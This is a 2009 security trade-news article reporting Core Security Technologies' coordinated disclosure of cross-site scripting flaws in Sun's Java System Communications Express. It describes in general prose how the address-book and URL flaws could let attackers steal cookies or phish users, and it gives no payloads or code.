Free Newsletter
Register for our Free Newsletters
Access Control
Deutsche Zone (German Zone)
Education, Training and Professional Services
Government Programmes
Guarding, Equipment and Enforcement
Industrial Computing Security
IT Security
Physical Security
View All
Other Carouselweb publications
Carousel Web
Defense File
New Materials
Pro Health Zone
Pro Manufacturing Zone
Pro Security Zone
Web Lec
ProSecurityZone Sponsor
ProSecurityZone Sponsor
ProSecurityZone Sponsor
ProSecurityZone Sponsor
ProSecurityZone Sponsor
ProSecurityZone Sponsor

Sun Java web application vulnerability details

Core Security Technologies : 25 May, 2009  (Technical Article)
Cross Site Scripting vulnerability in Sun Java application discovered by Core Security Technologies
Core Security Technologies, provider of Core Impact solutions for comprehensive enterprise security testing, has issued an advisory disclosing critical vulnerabilities that could affect large numbers of end users and organizations using Sun’s Java System Communications Express Web-based communications and collaboration application.

Core Security Technologies consultants working with CoreLabs, the research arm of Core Security, unearthed multiple vulnerabilities in Sun’s Java System Communications Express, a remote access element of Sun’s Java Communications Suite, which, if leveraged, could allow attackers to target users of the application through exploitation of cross-site scripting (XSS) bugs.

Upon making the discoveries, CoreLabs immediately alerted the Sun Security Coordination Team to the vulnerabilities and the two companies have since synchronized efforts to ensure that patches could be created and made available to protect users of the program.

“Cross-Site Scripting bugs are popular among attackers attempting to coax Web applications into providing control of end users’ Web browsers to carry out a wide range of malicious schemes,” said Ivan Arce, CTO of Core Security Technologies. “It is very important that organizations take the necessary steps to ensure that the applications they build or license from third parties are not susceptible to these types of exploits.”

Sun’s Java System Communications Express is aimed primarily at organizations seeking to offer their users remote access to browser-based email, calendaring and task management.

The XSS issues uncovered in Java System Communications Express reside in the product’s personal address book and another URL and were initially discovered and researched by the Security Consulting Services team from Core Security Technologies.

CoreLabs security researchers found multiple XSS vulnerabilities in Java System Communications Express, specifically in two individual URLs. Cross-site scripting (XSS) vulnerabilities allow an attacker to execute arbitrary scripting code in the context of the user browser (in the vulnerable application’s domain). For example, an attacker could exploit an XSS vulnerability to steal user cookies (and then impersonate the legitimate user) or redirect them to a fake page requesting information from the user (ie credentials). This vulnerability occurs when user-supplied data is displayed without encoding.

In the case of the first XSS vulnerability, resident in the product’s Personal Address Book “add contact” functionality, the affected URL is originally accessed thru a POST request, and the flaw can be exploited both with a GET and with a POST request. The contents of the variables involved in a potential attack are not encoded at the time of using them in HTML output, therefore allowing an attacker who controls their content to insert JavaScript code.

In the second vulnerability, the contents of the URL are not encoded at the time of using them in HTML output, therefore allowing an attacker who controls their content to insert JavaScript code. This vulnerability can be exploited through a GET request, and the user does not need to be logged into the web application. This makes this XSS vulnerability particularly open to email-based attacks through which an attacker could send a link to a ‘calendar’ and ‘exploit’ the victim.
Bookmark and Share
Home I Editor's Blog I News by Zone I News by Date I News by Category I Special Reports I Directory I Events I Advertise I Submit Your News I About Us I Guides
   © 2012
Netgains Logo